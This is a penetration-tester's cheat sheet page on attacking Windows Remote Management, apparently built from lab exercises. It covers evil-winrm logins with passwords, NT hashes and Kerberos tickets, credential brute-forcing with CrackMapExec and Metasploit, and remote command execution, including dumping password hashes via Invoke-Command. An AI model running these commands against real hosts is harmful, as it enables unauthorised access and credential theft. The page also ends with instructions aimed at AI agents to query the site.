# WinRM (5985, 5986) [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Nmap ```shell-session nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n ``` ## Evil-WinRM ``` Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error ``` If you get the error above on connecting to a host, you can add these following lines to `/etc/ssl/openssl.cnf` . ``` [legacy_sect] activate = 1 ``` ```shell-session evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD! ``` ``` evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"` ``` To use evil-winrm to connect to an **IPv6 address** create an entry inside ***/etc/hosts*** setting a **domain name** to the IPv6 address and connect to that domain. ``` SQL (hacker dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("ipconfig");'; [*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: Windows IP Configuration Ethernet adapter Ethernet0 2: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::1001 IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8 IPv4 Address. . . . . . . . . . . : 10.13.38.11 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : dead:beef::1 fe80::250:56ff:fe94:1921%8 10.13.38.2 Ethernet adapter Ethernet1 2: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 172.20.128.101 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : Express Edition will continue to be enforced. SQL (hacker dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("hostname");'; [*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: COMPATIBILITY Express Edition will continue to be enforced. ``` ``` # cat /etc/hosts | grep comp dead:beef::1001 compatibility ``` ``` # evil-winrm -u 'administrator' -p 'SecretPassword' -i compatibility Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> ``` ### With Kerberos ``` $ cat /etc/krb5.conf [libdefaults] default_realm = DOMAIN.HTB [realms] DOMAIN.HTB = { kdc = dc01.domain.htb } [domain_realm] .domain.htb = DOMAIN.HTB domain.htb = DOMAIN.HTB ``` ``` $ impacket-getTGT 'domain.htb/username:password' -dc-ip 10.10.11.31 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in m.harris.ccache $ KRB5CCNAME=username.ccache evil-winrm -u username -i dc01.domain.htb -r domain.htb Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: User is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\username\Documents> ``` ### With docker ```bash docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password' ``` {% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %} [Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md) {% endcontent-ref %} ### Upload `*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop` ### Download `*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip` ## Python - evil-winrm-py {% embed url="" %} ## Metasploit {% embed url="" %} {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} ``` msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17 rhosts => 192.168.210.17 msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator USERNAME => Administrator msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local DOMAIN => internal.zsm.local msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e msf6 auxiliary(scanner/winrm/winrm_login) > run [!] No active DB -- Credential data will not be saved! [+] 192.168.210.17:5985 - Login Successful: ``` ## Netexec - CME {% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %} [NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md) {% endcontent-ref %} ```shell-session $ crackmapexec winrm 10.129.42.197 -u user.list -p password.list WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None) WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!) ``` #### Command execution ``` [Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\' SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV) WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin) WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell) WINRM 10.129.202.136 5985 WINSRV WINRM 10.129.202.136 5985 WINSRV WINRM 10.129.202.136 5985 WINSRV Directory: C:\ WINRM 10.129.202.136 5985 WINSRV WINRM 10.129.202.136 5985 WINSRV WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ---- WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86) WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows WINRM 10.129.202.136 5985 WINSRV [Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace # ``` ## PSSession {% hint style="success" %} *Enabled by default on Server 2012 onwards with firewall exception* {% endhint %} PSRemoting uses WinRM On Desktop, may need to enable remoting (admin privs needed): `Enable-PSRemoting` {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Create a session on a remote computer ```powershell $Server01 = New-PSSession -ComputerName Server01 ``` ### List PSSession ```powershell Get-PSSession ``` ### Enter-PSSession To use the **PSSession** to interact directly with a remote computer, use the `Enter-PSSession` cmdlet ``` PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT [SEC504STUDENT]: PS C:\Users\Sec504\Documents> [SEC504STUDENT]: PS C:\Users\Sec504\Documents> Get-Service | Where-Object -Property Status -EQ Running Status Name DisplayName ------ ---- ----------- Running AarSvc_75beb Agent Activation Runtime_75beb Running Appinfo Application Information Running AppXSvc AppX Deployment Service (AppXSVC) Running AudioEndpointBu... Windows Audio Endpoint Builder Running Audiosrv Windows Audio Running BFE Base Filtering Engine ... [SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession PS C:\WINDOWS\system32> ``` ### Pass Username / password ```powershell New-PSSession -Session $s -Credential Domain01\User01 ``` With a variable ``` PS C:\WINDOWS\system32> $cred = Get-Credential cmdlet Get-Credential at command pipeline position 1 Supply values for the following parameters: Credential PS C:\WINDOWS\system32> $cred UserName Password -------- -------- sec504 System.Security.SecureString ``` Or ```powershell $Username = « USERNAME » $SecurePassword = « PLAINPASSWORD » | ConvertTo-SecureString -AsPlainText -Force $PScred = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName,$SecurePassword ``` ```powershell $cred = New-Object Management.Automation.PSCredential ("Administrator", (ConvertTo-SecureString "Sup3Rp@ssw0rd" -AsPlainText -Force)) ``` ``` PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT -Credential $cred [SEC504STUDENT]: PS C:\Users\Sec504\Documents> $env:USERNAME Sec504 [SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession PS C:\WINDOWS\system32> ``` Interact with an existing session ```powershell Enter-PSSession -Id 19 Enter-PSSession -Name Session1 Enter-PSSession -Session $session1 ``` ### Execute command or scriptblocks ```powershell Invoke-Command -ScriptBlock{hostname;whoami} -Session $session1 Invoke-Command -ScriptBlock{C:\Users\Public\hostname.ps1} -Session $session1 Invoke-Command -ScriptBlock{Get-Process} -ComputerName (Get-Content ) Invoke-Command -FilePath C:\scripts\script.ps1 -ComputerName (Get-Content ) ``` Execute locally loaded function on the remote machines ```powershell Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) -ArgumentList ``` Stateful commands ```powershell $Sess = New-PSSession -Computername Server1 Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process} Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name} ``` ## Winrs ``` winrs -remote:server1 -u:server1\administrator -p:passw0rd hostname ``` ## WSMan-WinRM {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\ The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals. * [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\ A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network. * [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\ The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/winrm-5985-5986.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.